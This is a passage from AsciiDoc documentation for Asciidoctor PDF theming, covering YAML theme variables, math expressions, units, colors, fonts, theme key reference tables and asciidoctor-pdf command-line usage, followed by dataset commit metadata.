=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In other words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `sidebar_title_font_color` key.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your (very patriotic) brand colors:\n\n[source,yaml]\n----\nbrand:\n red: #E0162B\n white: #FFFFFF\n blue: #0052A5\n----\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: $brand_blue\n----\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations to support calculated values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: As in programming languages, multiply and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number down to the previous integer.\nceil(...):: Rounds the number up to the next integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n
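The other rounding functions follow the same pattern.\nFor instance, a sketch using `floor` and `round` (the key names come from this guide; the multipliers are illustrative):\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n # floor() drops the fractional part; round() snaps to the nearest half\n font_size_small: floor($base_font_size * 0.85)\n font_size_large: round($base_font_size * 1.25)\n----\n\n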
=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, we humans like to think in real world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\n+\nThe special value `transparent` indicates that a color should not be used.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\nIt's also possible to specify no color by assigning the special value `transparent` as shown here:\n\n[source,yaml]\n----\nbase:\n background_color: transparent\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how an RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 to 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages are currently resolved relative to the value of the `pdf-stylesdir` attribute.\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) is not supported.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle_page:\n background_image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle_page:\n background_image: image:title-cover.png[]\n----\n\nAs in the AsciiDoc syntax, the inline image macro allows you to set the width and alignment of the image:\n\n[source,yaml]\n----\ntitle_page:\n logo_image: image:logo.png[width=250,align=center]\n----\n\n== Fonts\n\nYou can select from <<built-in-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc.).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Bundled fonts\n\nAsciidoctor PDF bundles several fonts that are used in the default theme.\nYou can also use these fonts in your custom theme.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8.\n\nThe family names of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[NotoSerif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[Mplus1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[Mplus1pMultilingual]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUseful as a fallback font.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you define your own custom fonts.\nThis limitation may be lifted in the future.\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF files of the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nAs with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n
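As the TIP above notes, you can register more than one fallback font.\nA sketch of what that looks like (the second entry, `NotoEmoji`, is a hypothetical key used here only for illustration; each key listed must also be declared in the catalog):\n\n[source,yaml]\n----\nfont:\n catalog:\n # ...font declarations as shown above...\n # NotoEmoji is a hypothetical second fallback\n fallbacks: [DroidSansFallback, NotoEmoji]\n----\n\n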
== Keys\n\nTBW\n\n=== Page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [width, height]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_font_size\n|<<values,number>>\n|font_size: 9\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_color^[1]^\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_h<n>_font_family^[1]^\n|<<fonts,font family name>>\n|h4_font_family: Roboto\n\n|heading_h<n>_font_size^[1]^\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_h<n>_font_style^[1]^\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n^[1]^ `<n>` may be a number ranging from 1 to 6, representing each of the six heading levels.\n\n=== Title page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: $base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"1a,1a,1a\", grid=none, frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n=== Caption\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: NotoSerif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n|===\n\n=== Sidebar\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n=== Outline list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|list_indent: 40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n
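As with any other category, these flattened keys can be written in nested form in your theme file.\nFor example, a sketch using the example values from the table above:\n\n[source,yaml]\n----\ntable:\n background_color: FFFFFF\n border_color: DDDDDD\n border_width: 0.5\n cell_padding: [3, 3, 6, 3]\n even_row_background_color: F9F9F9\n----\n\n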
\"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|number\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|indent: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>^[1]^\n|quoted string\n|right: '\\{page-number}'\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>^[1]^\n|quoted string\n|center: '\\{page-number}'\n|===\n\n^[1]^ `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\n==== Implicit attributes\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nHere's an example that shows how these attributes can be used in the running footer:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n==== Images\n\nYou can add an image to the 
running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running footer.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n image_valign: 2 # <1>\n recto_content:\n left: image:footer-logo.png[width=80]\n right: '{page-number}'\n verso_content:\n left: $footer_recto_content_right\n right: $footer_recto_content_left\n----\n<1> You can use the `footer_valign` attribute to slighly nudge the image up or down.\n\nCAUTION: The image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly.\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7077b701692290165856eb564f4794b051d622c9","subject":"clarify a few things about the pdf theme attributes","message":"clarify a few things about the pdf theme 
